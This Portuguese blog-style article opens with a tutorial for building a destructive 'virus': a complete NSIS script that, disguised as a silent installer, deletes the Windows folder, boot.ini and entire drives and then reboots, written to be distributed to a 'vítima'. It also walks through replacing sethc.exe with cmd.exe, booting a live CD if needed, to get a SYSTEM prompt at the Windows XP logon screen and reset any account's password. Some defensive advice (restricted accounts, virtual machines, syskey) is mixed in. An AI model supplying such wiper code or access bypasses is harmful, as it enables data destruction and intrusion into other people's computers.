Bom, chega de teoria, não que não seja importante, mas já falei demais. Se você quer fazer vírus, arregace as mangas e parta para o estudo, você deverá estudar e fuçar muito. E cuidado para o feitiço não virar contra o feiticeiro, he he he.

Vou mostrar como fazer um simples programinha devastador, que apaga TUDO do HD. Tanto os arquivos do usuário como as pastas do sistema e os programas. Ele será rodado no Windows, então alguns arquivos de sistema não serão apagados porque estarão em uso. Mas apagando a maioria e alguns estratégicos, já é o suficiente para que o computador nem inicie, a menos que a pessoa formate e reinstale tudo (mas aí ela já teria perdido seus dados).

Apagar arquivos… Sugiro usar o gerador de programas de instalação NSIS (Nullsoft Scriptable Install System). Ele é destinado a desenvolvedores e distribuidores de aplicações, mas é muito versátil. Você cria um “falso” programa de instalação, que na real não instala é nada, apenas apaga coisas. Esse NSIS funciona com um script, você cria um arquivo de texto com as instruções, compila nele, e ele gera o executável baseado nessas instruções. O uso do NSIS é uma boa também porque o executável fica extremamente pequeno, com menos de 50 kb. Mas você poderia usar, é claro, outros instaladores…

Baixe o NSIS em nsis.sourceforge.net e instale-o. Ele é gratuito (e open source). Não vamos nos deter com o script dele, vamos direto ao assunto. Ele possui uma função “Delete”, que apaga arquivos ou pastas. Basta você adicionar os nomes de arquivos ou pastas desejados, e gerar o programa. Esta função deveria ser usada para apagar arquivos de um programa que seria desinstalado, já que o NSIS é um criador de programas de instalação para outros programas. Mas como apaga arquivos que você define, pode ser usada para o mal também, só depende das suas intenções. Em menos de 1 minuto seu vírus estará pronto.

Com o NSIS instalado, abra um editor de textos puro, como o Bloco de notas, e digite (ou copie e cole) o texto em vermelho:

!define PRODUCT_NAME “APAGADOR_XXX”
!define PRODUCT_VERSION “1.0″
!define PRODUCT_PUBLISHER “HACKER_XXX”

SetCompressor lzma

Name “${PRODUCT_NAME} ${PRODUCT_VERSION}”
OutFile “MeuVirus.exe”
InstallDir “$TEMP”
Icon “${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico”
SilentInstall silent

Section “Sec001″ SEC01
Delete /REBOOTOK “$WINDIR\*.*”
SectionEnd

Section -Post
Reboot
SectionEnd

Salve com a extensão “.nsi”, e escolha “Todos os arquivos”, no campo “Salvar como tipo”. A extensão “.nsi” é a de projeto do NSIS, você poderia usar outra qualquer e depois abri-lo no compilador do NSIS (”Iniciar > Programas > MakeNSISW (Compiler GUI)”).

Vamos entender esse arquivo… As três primeiras linhas identificam o “programa” que seria instalado, afinal o NSIS é um instalador. Deixe como está, ou escreva qualquer coisa, de preferência não palavras. O item “OutFile” é o executável que será gerado, é o seu vírus que deverá ser distribuído. A linha “SilentInstall silent” gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.

Na seção “Sec01″, você deve adicionar as entradas “Delete” que desejar. Existem outros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.

A linha “Delete /REBOOTOK “$WINDIR\*.*” apaga tudo da pasta do Windows, deixando para apagar na próxima inicialização o que estiver em uso. Copie-a e cole-a abaixo dela, antes do SectionEnd, trocando as pastas ou arquivos que você queira apagar. Por exemplo:

Delete /REBOOTOK “C:\boot.ini”
Delete /REBOOTOK “C:\Meus documentos\*.*”
Delete /REBOOTOK “C:\*.*”
Delete /REBOOTOK “D:\*.*”
Delete /REBOOTOK “E:\*.*”
Delete /REBOOTOK “F:\*.*”
Delete /REBOOTOK “G:\*.*”
Delete /REBOOTOK “C:\Arquivos de programas\*.*”

Adicione o que quiser, arquivos específicos, etc.

A última seção, “Section -Post / Reboot / SectionEnd”, será executada ao concluir o instalador, ou seja, quando ele terminar sua ação. O comando “reboot” reiniciará o computador, que na próxima inicialização nem inicia mais. Se você quiser, pode remover essas três últimas linhas, para deixar o usuário em desespero, vendo que tudo do seu PC foi apagado.

Salve o arquivo. Abra o compilador do NSIS, em “Iniciar > Programas > MakeNSISW (Compiler GUI)”, clique no menu “File > Load script”, localize o arquivo de extensão “.nsi” que você salvou. Ele já compilará, é rapidinho. NÃO CLIQUE NO BOTÃO “TEST INSTALLER”.

O vírus está pronto! E, em condições normais, nenhum anti-vírus o detectaria, a menos que ele fosse parar nas mãos de algum criador de anti-vírus.

Como testá-lo sem se ferrar por conta da própria criação? Use máquinas virtuais! Já comentei aqui no Explorando sobre o Bochs, na seção de matérias do site Mep Sites (materias.mepsites.cjb.net) você encontra um tutorial dele. Pode usar também o QEMU, com a ajuda do Kemula (kemula.mepsites.cjb.net), se precisar. Ou o comercial e carinho VMware. Usando uma máquina virtual você ferra apenas o sistema virtual, que pode ser facilmente restaurado se você tiver uma cópia dele em CD ou outra pasta. Dica: use máquinas virtuais também para testar pela primeira vez programas que você pega na Internet, e mais: navegue na Internet só pela máquina virtual! Quanto ao seu “virusinho”, se preferir, teste num PC cobaia, onde você saiba que tudo pode ser apagado. Leia a ajuda do NSIS para ver outros comandos e constantes de pastas.

Fácil, não?

Claro, isso é só um exemplo, ideal para lammers ou gente que se acha (e que na real não sabe é nada). Ou mesmo para quem está curioso e iniciando. Para fazer vírus específicos é recomendável dominar uma linguagem de programação. E lembre-se: você deve saber o que o vírus fará, o que ele vai atacar, e mais, saber como atacar. Não adianta querer ver a agenda do celular da namorada se você não souber onde ela guarda o celular. Não adianta querer ferrar um programa se você não souber que arquivos ou chaves do registro ele utiliza.

Por essas e outras, muito, muito cuidado ao abrir programas da Internet. Não clique naqueles banners de propaganda suspeitos, com carinhas lindas. Não clique no anúncio “Almente o tamanho do seu pênis”. Não veja as montagens de fotos que não sei quem fez de você com não sei quem lá, e que te deixou um recado no orkut. Cuidado com os joguinhos em flash “executáveis”; se eles forem de origem desconhecida, tome mais cuidado ainda, prefira ver as versões em páginas HTML com o “.swf” separado. Mesmo se foi um amigo confiável que te passou, ele pode ter pego num site malicioso sem saber, ou então recebeu do primo do colega do vizinho da tia de outra cidade. Se você navega na Internet e mantém arquivos importantes no seu computador, considere o uso de uma conta de usuário restrita para navegar, ou use a conta de “Convidado”, é o melhor a ser feito. Mantenha suas partições no Windows formatadas em NTFS, pois ao usar uma conta restrita, ela não terá acesso completo aos arquivos do sistema nem das outras pastas. Se o apagador que mostrei como criar, por exemplo, fosse rodado com uma conta de usuário restrita numa partição em NTFS, ele não conseguiria apagar praticamente NADA da pasta do Windows nem das outras pastas. O maior estrago seria na conta de usuário usada para rodá-lo, por isso se fosse um usuário restrito ou o convidado, seus arquivos estariam a salvo. Note que mesmo em NTFS, se você usasse a conta de administrador, boa parte dessa proteção iria por água abaixo, já que normalmente os administradores podem apagar arquivos do sistema e das outras pastas. E um programa executado como administrador, tem todos os direitos concedidos à conta de administrador. Ao instalar um programa, desmarque na instalação tudo o que for suspeito, especialmente se não estiver documentado. Muitas barras de ferramentas extras que aparecem no seu navegador foram instaladas junto com algum programa que você instalou “conscientemente”, clicando em tudo, sem ler nada. LEIA. LEIA TUDO O QUE PUDER. Muitos spywares são documentados na licença de uso de um software, e muitos brasileiros que já não têm costume de ler mesmo, assim instalam ele sem saber. Um software que se preze e que respeite seus usuários deixa bem claro suas condições de uso, você só usa se concordar. E nada mais justo, se não concordar, simplesmente NÃO UTILIZE.

Uma dica para usuários do Windows XP ou as versões superiores. Ao rodar um programa suspeito, ou animações em flash executáveis, joguinhos que se dizem que “não precisa instalar”, etc, o Windows pode desativar algumas alterações que o programa tente realizar. Por exemplo, ele não conseguirá alterar NADA no registro, o que é uma grande vantagem. Claro, se o programa depender disso para funcionar, nada feito, ele não irá rodar ou mostrará uma série de mensagens de erro. Executar programas confiáveis assim pode fazer com que eles não funcionem também, pois é comum um programa ler e gravar dados no registro ao ser aberto ou fechado. Já um joguinho “não instalável” ou uma animação em flash não deveria fazer nada isso, né? Para executar um programa no modo restrito: clique com o botão direito do mouse no ícone do mesmo, escolha “Executar como”. Deixe selecionado o seu nome de usuário, e deixe marcado o item “Proteger meu computador e meus dados contra atividades não autorizadas de programas”. Dê OK. Abrindo o programa assim, entre outras coisas, ele não poderá alterar nada no registro do Windows. Se o item “Executar como” não aparecer no menu, selecione o arquivo, segure SHIFT e clique com o direito nele.

Para programas suspeitos ou totalmente desconhecidos, eu recomendo testar em máquinas virtuais, como comentei mais acima. É melhor. Se der pau, dá só nela (a menos que você tenha arquivos no seu PC na rede compartilhados com permissão de escrita). Apague o arquivo do HD virtual e recopie a pasta. É mais prático do que usar uma máquina cobaia, tendo que reinstalar ou reparar tudo.

Enfim, esta dica tem diversos públicos. Não estou incentivando o mal, mas tirando uma curiosidade de muita gente sobre os vírus. O uso que se fará dela é de responsabilidade de cada um, né?! Um martelo pode ser usado na construção da sua casa, dos seus móveis. Mas pode também servir também para estourar seus miolos. Tudo é relativo.

O Windows XP é relativamente robusto e estável, além de oferecer muitas opções de configuração. Deveria ser seguro nas mesmas proporções, mas, infelizmente, não é isso o que acontece. Uma vez precisei da senha de administrador de uma instalação do meu Windows 2000, pois instalei às pressas e não anotei a senha. Para meu uso diário, fiz uma conta limitada, mas, um belo dia precisei me logar como administrador para instalar os drivers da webcam. Aí começou a dor de cabeça: e agora, que senha eu usei na instalação?

Percorrendo a Internet, não demorou muito para encontrar a solução. No Windows NT/2000, para contas locais, basta apagar os arquivos SAM e SAM.log, da pasta C:\WINDOWS\system32\config.

Aproveitando a solução, testando no Windows XP, não funcionava: o sistema ficava inacessível após a remoção destes arquivos, e nem iniciava mais. Ou seja, isso foi detectado e corrigido no Windows XP, mas não no 2000, pelo menos, não até o Service Pack 4.
Qualquer um pode ser administrador!
Recentemente, recebi pela área de envio de dicas de um dos meus sites, uma dica bem rápida, aproveitando-se de um recurso do Windows XP para obter acesso como administrador. Deixo então o agradecimento pela colaboração do Rhadsclei, que me passou a idéia e o nome do arquivo envolvido, e decidi comentá-la neste texto, detalhadamente.

O Windows XP usa uma conta especial do sistema, chamada “SYSTEM”. Essa conta é usada enquanto nenhum usuário está logado, pois para os programas funcionarem no Windows NT, eles precisam de uma conta de usuário, e usarão as configurações de personalizações e segurança do perfil desse usuário. Mesmo após o logon, se você abrir a guia “Processos” do Gerenciador de tarefas, verá que alguns programas são executados por essa conta, “SYSTEM”. Possivelmente são serviços essenciais inicializados antes do ponto de logon, onde há interação com o usuário. Muito provavelmente esta conta especial é usada durante a instalação do Windows também, após o início da parte gráfica. A “brecha” é que ela possui privilégios administrativos. Qualquer programa rodado com ela, tem direitos de administrador, e pode fazer o que bem quiser no sistema. Eis o segredo: rodar um programa sem fazer logon, usando essa conta. Você me perguntaria: mas como, se antes de fazer logon não tenho acesso a nenhum menu ou meio de chamar programas?

Por vias normais, não. Mas...

O Windows possui ferramentas de acessibilidade, para auxiliar de forma mínima usuários com deficiências motoras e/ou audiovisuais. Ele possui um gerenciador de utilitários, chamado pelo atalho Win+U. Independentemente deste, pode-se ficar segurando a tecla SHIFT por 8 segundos, e então as opções de acessibilidade são abertas. Elas permitem configurar o alto-contraste, o movimento do cursor do mouse via teclado, a emissão de sons em determinadas situações, a piscagem da tela durante a reprodução de um som de sistema (como um “beep”, por exemplo), etc. Para permitir que os usuários com necessidades especiais tenham esse auxílio durante o logon, o atalho de ficar segurando SHIFT por 8 segundos funciona também na tela de logon.

Eis o truque, facilmente aplicado: substituir o arquivo que é chamado pelo atalho das opções de acessibilidade por outro executável qualquer. O mais prático é o “cmd.exe”, o interpretador de comandos. Basta acessar a pasta system32, renomear (ou apagar) o arquivo “sethc.exe”, e então copiar o “cmd.exe” para essa mesma pasta, renomeando a cópia com o nome “sethc.exe”. Só isso. Agora, ao segurar SHIFT por 8 segundos, o prompt de comando será aberto. Na tela de logon, como os direitos da conta usada ali são de administrador, o prompt de comando será executado como administrador.

Nota: na tela de logon que lista os usuários, o prompt de comando (ou o arquivo “sethc.exe”, mais precisamente) poderá ficar oculto, por trás dela. Para não se atrapalhar e exibi-lo corretamente, alterne para o logon clássico, teclando duas vezes CTRL + ALT + DEL. (No Windows NT, teclar duas vezes CTRL + ALT + DEL não faz com que o sistema seja reiniciado; se você não acompanhou o Windows 2000/XP e só conhece o 9x/Me, é bom saber disso :)

O arquivo pode ser substituído facilmente se o usuário possuir uma conta local, mesmo que restrita, e se o HD estiver formatado em FAT/FAT32. Usando o próprio Explorer pode-se trocar o arquivo, já que ele não fica aberto o tempo todo. Se o HD estiver formatado em NTFS, onde os usuários limitados não têm permissão de escrita nas pastas de sistema do Windows, e/ou se o usuário for um intruso que não possui sequer conta local, basta usar um sistema alternativo, que rode do CD. O mais comum é o Linux, diversas distros, como o Kurumin :) Isso considerando que o sistema possa ler e escrever em NTFS, o que é o caso do Kurumin 7.

Rodando o prompt de comando como administrador, você pode chamar programas, que serão executados com privilégios de administrador. Rode "control userpasswords2" para criar novos usuários ou redefinir a senha de qualquer conta de usuário, incluindo, é claro, do administrador.

Se preferir, use o console de gerenciamento do computador (compmgmt.msc), e clique em “Usuários e grupos locais”. Eu me surpreendi, pois foi possível rodar até o Explorer! Veja alguns screenshots. Para decepção dos usuários que confiam tanto na segurança do Windows, saiba que estas imagens não foram montadas num programa gráfico, foram todas obtidas com o famoso “Print Screen”, salvas originariamente no Paint, também rodando sem fazer logon:


Ao dar o comando “explorer.exe” no prompt, o Explorer foi aberto. Na primeira vez, definiu o papel de parede “Alegria”, que é padrão, e ainda ofereceu o “Tour do Windows”. Observe a tela de logon arrastada para o topo. Nenhuma senha foi necessária.





























Ao dar CTRL+ALT+DEL, abriu-se o Gerenciador deTarefas. Pelo visto, ele ficou instável :( Isso ocorreu com alguns outros programas também. No entanto, após criar uma conta e se logar com ela, o acesso ao sistema ficava “normal”.


















Clicando com o direito na área de trabalho e em “Propriedades”, pode-se alterar os temas. Veja, deixei o prateado para a tela de logon! Até que esta dica pode ser útil para mera personalização, você altera as opções visuais da tela de logon sem precisar tocar no registro.
Percebi alguns problemas de estabilidade ao rodar programas deste modo, como no gerenciador de tarefas, o copiar/colar arquivos pelo Explorer não funcionava, etc. Depois de uns 5 minutos o Explorer era fechado sozinho, não sei se isso foi programado ou se é devido algum erro não esperado. Afinal não é esperado “fazer logon sem fazer logon”, com a conta de usuário SYSTEM. Mas ele podia ser aberto a qualquer momento, digitando-se “explorer” no prompt de comando novamente.

Talvez isso possa ser usado também no Windows Server 2003, visto que possui muita coisa herdada do XP. Eu não testei, mas me deu uma vontade danada de instalá-lo só para testar. Se funcionar, a Microsoft pisou na bola legal com os usuários dos servidores, afinal isso num servidor é inaceitável. Como não testei, não posso dizer muito, além de meras “premonições”. Eu estava usando o Windows XP SP1, e coloquei o SP2 só para ver se o problema permanecia nele. Afinal, se tivesse sido corrigido, eu nem me atreveria a escrever este texto. “Pode ser” que alguma das atualizações automáticas tenha corrigido isso, eu não sei porque não uso o computador principal com Internet, portanto, nada de atualizações automáticas. Mas acredito que não, senão esta falha já teria vazado muito mais amplamente.

E como se proteger?

Uma dica para proteção, caso você tenha computadores com Windows XP na empresa (ou em qualquer lugar que seja), e queira se prevenir, é usar o “syskey”. Ele é um programinha não documentado que vem com o Windows, e permite alterar a forma de criptografia das contas de usuários locais. Você pode configurar o Windows para solicitar uma senha especial, independentemente de qualquer conta de usuário, a toda inicialização. Se quiser mais proteção, pode requerer um disquete obrigatório. Sem ele, não se usa o Windows. Para isso basta abrir o SysKey, digitando syskey no “Executar”.










Tela do SysKey. Clique em “Atualizar” para alterar a proteção do sistema das contas de usuários. Não perca a senha nem o disquete, se for o caso, senão, adeus contas de usuários (mas os arquivos permanecem em C:\Documents and settings). Você poderá instalar o Windows do zero em outra pasta, mas perderá acesso a qualquer arquivo criptografado em partições NTFS (se você possuir arquivos protegidos desta forma, é claro).

Pelo menos em teoria, ao ativar a criptografia do banco de dados de contas de usuários dessa forma, o Windows não tem como permitir o logon de ninguém, simplesmente porque não tem as informações das contas, que estariam codificadas na senha especial ou no arquivo do disquete. Pelo que testei, o atalho de segurar SHIFT por 8 segundos não funcionou na tela que pede a senha especial (do syskey). Uma outra idéia, complementar a esta e que não deve ser usada sozinha, é remover ou trocar o arquivo “logon.scr”, na pasta system32, a proteção de tela padrão. Os efeitos poderiam ser parecidos se o usuário substituisse esse arquivo pelo prompt de comando, e esperasse ansiosamente por 10 minutos na tela de logon. Para quem não sabe, uma proteção de tela é um arquivo executável, com a extensão “.scr” (eles possuem diferenças técnicas sim, com relação aos “.exe”; mas se você renomear um “.exe” para “.scr”, verá que funciona da mesma forma).

A responsabilidade é de cada um


Concluindo

Isso mostra que a senha de administrador no Windows XP e nada é a mesma coisa. Como o software é fechado, a comunidade não pode fazer nada, devendo esperar por um patch da Microsoft. Isso “se sair”. Enquanto isso, o Windows em casa ou no escritório, não está seguro. A idéia é de que a conta de administrador é segura, potente, de que realmente o sistema está protegido. Mas não é isso que ocorre. O acesso local, quando possível, é uma das formas mais fáceis de invadir um computador alheio. Portanto, pense em soluções físicas de proteção. Gabinetes com cadeado, câmeras de segurança onde tiver computadores importantes... Só para não falar da segurança paranóica aplicada em data-centers (paranóica, mas essencial!). Enfim, cuide-se.